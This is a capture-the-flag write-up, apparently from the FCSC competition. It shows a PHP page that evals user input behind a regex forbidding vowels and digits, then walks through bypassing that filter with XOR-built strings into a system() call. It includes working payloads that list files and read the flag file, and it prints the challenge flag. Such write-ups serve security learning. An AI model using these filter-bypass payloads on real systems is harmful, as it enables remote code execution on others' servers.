Vous avez trouvé cette page qui vous semble étrange. Pouvez-vous nous convaincre qu’il y a effectivement un problème en retrouvant le flag présent sur le serveur ?

There’s a strange page and we have to find the flag on the server.

<?php
	 if (isset($_GET['code'])) {
			 $code = substr($_GET['code'], 0, 250);
			 if (preg_match('/a|e|i|o|u|y|[0-9]/i', $code)) {
					 die('No way! Go away!');
			 } else {
					 try {
							 eval($code);
					 } catch (ParseError $e) {
							 die('No way! Go away!');
					 }
			 }
	 } else {
			 show_source(__FILE__);
	 }

Exploit

We have a GET parameter that is used in eval if it doesn’t contains vowels or numbers, otherwise the page prints the source code.

Thanks to eval we can execute php function, so we have to find a way to bypass the regex.

PHP can converts an array to the string “Array” and allows operations on strings. We can create any command we want from an array.

We can use this tool to create our payload.

So basically, what we want to do is execute commands with the PHP function system, like system('ls -alh') or system('cat flag.txt').

So let’s start by encoding system with our tool:

magnussen@funcMyLife:~/lipogrammeurs$ python alpha_exploit.py system xor "aeiouy0123456789"
============================================================ mucomplex ============================================================
('('^'[').('['^'"').('['^'(').('['^'/').('['^'>').('-'^'@')
magnussen@funcMyLife:~/lipogrammeurs$ python alpha_exploit.py 'ls -alh' xor "aeiouy0123456789"
============================================================ mucomplex ============================================================
(','^'@').(','^'_').('@'^'`')."-".('['^':').(','^'@').('@'^'(')

So our payload is:

$s=('('^'[').('['^'"').('['^'(').('['^'/').('['^'>').('-'^'@'); // system
$l=(','^'@').(','^'_').('@'^'`')."-".('['^':').(','^'@').('@'^'('); // ls -alh
$s($l); // system('ls -alh')

System ls

Nice, it works, now we just have to encrypt the cat command.

magnussen@funcMyLife:~/lipogrammeurs$ python alpha_exploit.py 'cat' xor "aeiouy0123456789"
============================================================ mucomplex ============================================================
('#'^'@').(':'^'[').('['^'/')

So our final payload will be:

$s=('('^'[').('['^'"').('['^'(').('['^'/').('['^'>').('-'^'@'); // system
$c=('#'^'@').(':'^'[').('['^'/'); // cat
$s($c.' .fl*'); // system('cat .fl*')

Flag

Nice, we have our flag: FCSC{53d195522a15aa0ce67954dc1de7c5063174a721ee5aa924a4b9b15ba1ab6948}.

This was a nice challenge, not very difficult but a classic CTF challenge.

Thanks to the FCSC team, this was an awesome CTF, I’ve learned a lot and had a lot of fun. Congratulation for the organization, see you next year!